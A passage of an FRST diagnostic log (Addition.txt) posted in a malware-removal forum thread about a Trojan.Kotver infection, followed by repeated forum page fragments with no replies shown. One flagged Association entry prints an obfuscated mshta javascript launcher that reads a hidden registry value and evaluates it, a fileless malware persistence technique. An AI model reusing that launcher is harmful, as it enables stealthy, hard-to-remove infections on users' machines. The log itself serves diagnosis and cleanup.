2013-03-07 03:12 - 2013-03-07 03:12 - 00024576 _____ () C:\UPS\WSTD\PolicyMgr\Microsoft.ApplicationBlocks.Data.dll

2013-07-31 08:11 - 2012-07-18 14:55 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-2430109965-1150345540-996092904-1000\Software\Classes\28fb7: "C:\Windows\system32\mshta.exe" "javascript:P3RKD="i0";n3i=new ActiveXObject("WScript.Shell");r4RKq="R9";YM16Vl=n3i.RegRead("HKCU\\software\\zgqpxjb\\agjd");CqBP6zv="oN2s";eval(YM16Vl);Qcfkz8SS="UMmzrcc";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2009-06-10 17:00 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2430109965-1150345540-996092904-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Dwight\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg

DNS Servers: 192.168.1.1

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{4D9DCD5A-C5C8-4873-9B64-81C222DA4AD8}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe

FirewallRules: [{25C9CC23-C5DF-466A-B1D0-C33B3E4DD468}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD Cinema\PowerDVDCinema10.exe

FirewallRules: [{5488591F-850E-46E0-BBE2-1AFA4870353A}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE

FirewallRules: [{39621F76-E724-4F32-A78B-2B60B1F576C3}] => (Allow) C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe

FirewallRules: [{9188A4DB-37C9-4F98-9395-E2ACD5D4C2ED}] => (Allow) C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe

FirewallRules: [{7D6FCD8C-4722-46F9-8557-50BC9A40CC44}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe

FirewallRules: [{9014FD65-A525-4068-9E86-685E138609EF}] => (Allow) C:\Program Files\HP\HP Photosmart 6510 series\Bin\DeviceSetup.exe

FirewallRules: [{1DD1E9B0-7726-417D-93F1-DAD54910F38B}] => (Allow) C:\Program Files\HP\HP Photosmart 6510 series\Bin\HPNetworkCommunicator.exe

FirewallRules: [{3CCB30E4-7754-4823-B84F-22F60B442DD5}] => (Allow) C:\Program Files\HP\HP Photosmart 6510 series\Bin\HPNetworkCommunicatorCom.exe

FirewallRules: [{99AFAD08-9903-4C9E-AAA0-68B225CE5F44}] => (Allow) C:\Program Files\HP\HP Photosmart 5520 series\Bin\DeviceSetup.exe

FirewallRules: [{E679D124-62BA-4A19-BA38-4D2AE4992D49}] => (Allow) C:\Program Files\HP\HP Photosmart 5520 series\Bin\HPNetworkCommunicator.exe

FirewallRules: [{774E775A-E585-4D79-AD66-584E1739038A}] => (Allow) C:\Program Files\HP\HP Photosmart 5520 series\Bin\HPNetworkCommunicatorCom.exe

FirewallRules: [{FEECC5AC-D41D-4C38-A77C-46CD527CFB88}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe

FirewallRules: [{5E81B513-4E09-47DA-9B38-834574B4BE38}] => (Allow) LPort=2869

FirewallRules: [{1695EA72-AB66-47C2-A312-9C5F9D69E6CF}] => (Allow) LPort=1900

FirewallRules: [{1D4158B2-5898-441F-AC8A-76947D77B10C}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe

FirewallRules: [TCP Query User{3FEEC144-B313-4706-8E7C-460E930E833D}C:\program files (x86)\kodak\kodak software updater\7288971\program\backweb-7288971.exe] => (Block) C:\program files (x86)\kodak\kodak software updater\7288971\program\backweb-7288971.exe

FirewallRules: [UDP Query User{B6D1B210-59AA-471B-9825-72350EA1C9D0}C:\program files (x86)\kodak\kodak software updater\7288971\program\backweb-7288971.exe] => (Block) C:\program files (x86)\kodak\kodak software updater\7288971\program\backweb-7288971.exe

FirewallRules: [{67580981-360F-4B5E-898B-272433124501}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\UNCServer.exe

FirewallRules: [{98E1D8B8-3E8A-440C-8D51-0ED599BCC881}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\UNCServer.exe

FirewallRules: [{976DEC02-6DAA-433A-B45A-D2E8B2E6A5CB}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\UNCServer.exe

FirewallRules: [{B4B63501-6FFE-4FEF-AAB2-7D3EFF495DE0}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\UNCServer.exe

FirewallRules: [{CAF514F9-20CE-49B0-A2BD-83297AB838A9}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\UNCServer.exe

FirewallRules: [{DFB23906-D5CB-452B-A2CD-8BB1C1632D39}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\UNCServer.exe

FirewallRules: [{CD300AEB-EEC0-40C7-BAA0-15157494B243}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{CF661D26-2545-4246-9682-7327B87EC88B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{B4C0F7D9-7040-4DD0-9AAC-1CE718BAED22}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

FirewallRules: [TCP Query User{3A4141E1-611B-45D8-968B-76090BAC4B4F}C:\program files (x86)\kodak\kodak software updater\7288971\program\backweb-7288971.exe] => (Block) C:\program files (x86)\kodak\kodak software updater\7288971\program\backweb-7288971.exe

FirewallRules: [UDP Query User{C99989A3-7925-4A97-887F-1F0E14383226}C:\program files (x86)\kodak\kodak software updater\7288971\program\backweb-7288971.exe] => (Block) C:\program files (x86)\kodak\kodak software updater\7288971\program\backweb-7288971.exe

==================== Restore Points =========================

08-10-2016 02:18:08 Scheduled Checkpoint

13-10-2016 03:00:30 Windows Update

14-10-2016 01:23:02 Windows Update

17-10-2016 11:42:28 Windows Modules Installer

17-10-2016 12:40:09 Windows Modules Installer

17-10-2016 12:40:51 Windows Modules Installer

17-10-2016 12:46:56 Windows Update

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:

==================

Error: (10/17/2016 01:31:19 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: EasyShare.exe, version: 2.0.2.225, time stamp: 0x3e93fc57

Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722

Exception code: 0x40000015

Fault offset: 0x0005620a

Faulting process id: 0x18e4

Faulting application start time: 0x01d2289c2c167108

Faulting application path: C:\Program Files (x86)\Kodak\Kodak EasyShare software\bin\EasyShare.exe

Faulting module path: C:\Windows\syswow64\msvcrt.dll

Report Id: 836e19d9-948f-11e6-ba80-606c66cc13d3

Error: (10/17/2016 01:30:28 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: LT_Updater.exe, version: 1.0.0.3, time stamp: 0x54edf2bf

Faulting module name: LT_Updater.exe, version: 1.0.0.3, time stamp: 0x54edf2bf

Exception code: 0x40000015

Fault offset: 0x0003af0a

Faulting process id: 0x96c

Faulting application start time: 0x01d2289c1bba79e5

Faulting application path: C:\Users\Dwight\AppData\Local\LocalTemperature\LT_Updater.exe

Faulting module path: C:\Users\Dwight\AppData\Local\LocalTemperature\LT_Updater.exe

Report Id: 651a5ada-948f-11e6-ba80-606c66cc13d3

Error: (10/17/2016 01:30:26 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/17/2016 01:01:52 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: EasyShare.exe, version: 2.0.2.225, time stamp: 0x3e93fc57

Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722

Exception code: 0x40000015

Fault offset: 0x0005620a

Faulting process id: 0x1758

Faulting application start time: 0x01d2289743754590

Faulting application path: C:\Program Files (x86)\Kodak\Kodak EasyShare software\bin\EasyShare.exe

Faulting module path: C:\Windows\syswow64\msvcrt.dll

Report Id: 662612b4-948b-11e6-9450-606c66cc13d3

Error: (10/17/2016 12:55:04 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: LT_Updater.exe, version: 1.0.0.3, time stamp: 0x54edf2bf

Faulting module name: LT_Updater.exe, version: 1.0.0.3, time stamp: 0x54edf2bf

Exception code: 0x40000015

Fault offset: 0x0003af0a

Faulting process id: 0x778

Faulting application start time: 0x01d228972b5868d2

Faulting application path: C:\Users\Dwight\AppData\Local\LocalTemperature\LT_Updater.exe

Faulting module path: C:\Users\Dwight\AppData\Local\LocalTemperature\LT_Updater.exe

Report Id: 731e0a1c-948a-11e6-9450-606c66cc13d3

Error: (10/17/2016 12:55:03 PM) (Source: WinMgmt) (EventID: 10) (User: )

Error: (10/17/2016 12:37:59 PM) (Source: Application Hang) (EventID: 1002) (User: )

Description: The program IEXPLORE.EXE version 10.0.9200.17148 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1974

Start Time: 01d22890fa897275

Termination Time: 10

Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Report Id:

Error: (10/17/2016 12:09:37 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: EasyShare.exe, version: 2.0.2.225, time stamp: 0x3e93fc57

Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722

Exception code: 0x40000015

Fault offset: 0x0005620a

Faulting process id: 0x1b5c

Faulting application start time: 0x01d22890c0f0595e

Faulting application path: C:\Program Files (x86)\Kodak\Kodak EasyShare software\bin\EasyShare.exe

Faulting module path: C:\Windows\syswow64\msvcrt.dll

Report Id: 198e1ec4-9484-11e6-b27a-606c66cc13d3

Error: (10/17/2016 12:06:24 PM) (Source: WinMgmt) (EventID: 10) (User: )

Error: (10/17/2016 12:06:23 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: LT_Updater.exe, version: 1.0.0.3, time stamp: 0x54edf2bf

Faulting module name: LT_Updater.exe, version: 1.0.0.3, time stamp: 0x54edf2bf

Exception code: 0x40000015

Fault offset: 0x0003af0a

Faulting process id: 0x9b4

Faulting application start time: 0x01d228906050274a

Faulting application path: C:\Users\Dwight\AppData\Local\LocalTemperature\LT_Updater.exe

Faulting module path: C:\Users\Dwight\AppData\Local\LocalTemperature\LT_Updater.exe

Report Id: a5f808e2-9483-11e6-b27a-606c66cc13d3

System errors:

=============

Error: (10/17/2016 01:48:40 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 20.

Error: (10/17/2016 01:30:43 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The Local Temperature Updater service terminated unexpectedly. It has done this 1 time(s).

Error: (10/17/2016 12:55:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The Local Temperature Updater service terminated unexpectedly. It has done this 1 time(s).

Error: (10/17/2016 12:06:24 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The Local Temperature Updater service terminated unexpectedly. It has done this 1 time(s).

Error: (10/17/2016 11:27:54 AM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The Local Temperature Updater service terminated unexpectedly. It has done this 1 time(s).

Error: (10/17/2016 11:08:14 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)

Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (10/17/2016 10:33:00 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 20.

Error: (10/16/2016 11:00:58 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)

Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (10/16/2016 09:32:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The Local Temperature Updater service terminated unexpectedly. It has done this 1 time(s).

Error: (10/16/2016 08:25:06 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The Local Temperature Updater service terminated unexpectedly. It has done this 1 time(s).

==================== Memory info ===========================

Processor: Intel® Core™ i3-3110M CPU @ 2.40GHz

Percentage of memory in use: 68%

Total physical RAM: 3661.68 MB

Available physical RAM: 1153.27 MB

Total Virtual: 7321.55 MB

Available Virtual: 3628.51 MB

==================== Drives ================================

Drive c: (Windows7_OS) (Fixed) (Total:450.62 GB) (Free:364.99 GB) NTFS ==>[system with boot components (obtained from drive)]

Drive q: (Lenovo_Recovery) (Fixed) (Total:13.67 GB) (Free:1.68 GB) NTFS

==================== MBR & Partition Table ==================

========================================================

Disk: 0 (Size: 465.8 GB) (Disk ID: 5846F193)

Partition 1: (Active) - (Size=1.5 GB) - (Type=07 NTFS)

Partition 2: (Not Active) - (Size=450.6 GB) - (Type=07 NTFS)

Partition 3: (Not Active) - (Size=13.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

#1
junger71442

Posted 20 October 2016 - 05:35 PM

Advertisements

#2
zep516

Posted 20 October 2016 - 07:36 PM

Similar Topics

0 user(s) are reading this topic

As Featured On:

Forums

Downloads

Members

Connect With Us

Trojan.Kotver Infection

#1 junger71442 Posted 20 October 2016 - 05:35 PM

Advertisements

#2 zep516 Posted 20 October 2016 - 07:36 PM

Similar Topics

0 user(s) are reading this topic

As Featured On:

Forums

Downloads

Members

Connect With Us

Sign In

#1
junger71442

Posted 20 October 2016 - 05:35 PM

#2
zep516

Posted 20 October 2016 - 07:36 PM